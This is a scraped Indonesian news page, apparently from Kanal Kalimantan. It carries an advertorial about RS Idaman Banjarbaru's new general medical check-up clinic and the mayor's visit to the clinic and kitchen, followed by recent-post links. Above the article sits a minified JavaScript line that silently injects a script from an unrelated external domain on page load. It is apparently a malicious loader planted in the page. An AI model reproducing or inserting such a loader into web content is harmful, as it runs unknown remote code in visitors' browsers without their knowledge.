(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

General Medical Check Up Kini Bisa di RS Idaman Banjarbaru


BANJARBARU, Rumah Sakit Idaman Banjarbaru menambah fasilitas layanan kesehatan terbaru untuk beri layanan terbaik ke warga Banjarbaru dan sekitarnya.

RS Idaman Banjarbaru kini sudah memiliki fasilitas Poliklinik Medical Check Up (MCU). Oleh Walikota Banjarbaru H Nadjmi Adhani secara langsung dilakukan peninjauan fasilitas Poliklinik MCU rumah sakit milik Pemkot Banjarbaru itu.
Untuk memastikan layanan itu sudah bisa berjalan, Walikota Banjarbaru H Nadjmi Adhani bersama Ketua DPRD H AR Iwansyah langsung mencoba layanan general medical check up tersebut, Selasa (15/5).

“Sementara ini, masyarakat masih ada yang belum tahu bahwa rumah sakit kita sudah bisa melayani general check up. Jadi sekarang uji coba sekaligus promosi, tidak perlu jauh lagi ke kota lain untuk melakukan medical check up umum,” ujar Nadjmi.

Pihak rumah sakit menyediakan 6 tawaran paket untuk general medical check up, yang bisa dipilih sesuai kebutuhan dan kemampuan pasien. Pemeriksaan medical check up seperti pemeriksaan mata, paru, THT, dan jantung. Pemeriksaan lainnya yang juga bisa dilakukan diantaranya rontgen, elektrokardiografi (EKG), treadmild, dan pengambilan darah, yang semuanya dapat diselesaikan dalam satu hari.

Selain mencoba Poliklinik MCU RS Idaman, Walikota Banjarbaru juga meninjau bagian instalasi gizi RS Idaman, dimana makanan untuk pasien diolah dan disiapkan.
Dapur rumah sakit selain bersih dan higienis, juga memiliki fasilitas yang lengkap. Bahkan makanan disiapkan oleh para chef yang berpengalaman.

RS Idaman menjalin kerjasama dengan APJI Kalsel untuk menyiapkan makanan bagi pasien. Agar makanan yang disajikan bukan hanya sehat dan sesuai dengan kebutuhan pasien, tapi juga enak dan disajikan dengan baik dan menarik. Sehingga pasienpun akan lebih bersemangat untuk menikmati hidangannya.

Di instalasi gizi ini, manajemen rumah sakit menunjukkan kepada Walikota Banjarbaru fasilitas pencucian peralatan makan yang digunakan pasien. Sehingga peralatannya yang digunakan selalu terjaga kebersihan dan kehigienisannya.

“Dapur rumah sakit kita ini sudah dilengkapi dengan berbagai fasilitas, jadi harus kita manfaatkan dengan  maksimal untuk kenyamanan pasien,” pungkas Nadjmi. (devi)

Reporter:Devi
Editor : Abi Zarrin Al Ghifari

Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Serap Aspirasi Gen Z, Pj Bupati Kapuas Erlin Hardi Main ke Kafe

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi menyambangi kafe untuk menyerap langsung… Read More

23 menit ago

TPK Kelurahan Selat Hilir Juara 3 Terbaik Nasional 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Kerja keras yang berbuah manis. Ungkapan tersebut tepat disematkan untuk Tim… Read More

31 menit ago

Ibadah dan Sosial Ekonomi Berkembang, Masjid At-Taqwa Karang Anyar III Diperluas

KANALKALIMANTAN.COM, BANJARBARU - Dalam beberapa tahun terakhir, antusias warga dalam melaksanakan peribadatan di Masjid At… Read More

2 jam ago

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

13 jam ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

15 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

21 jam ago

This website uses cookies.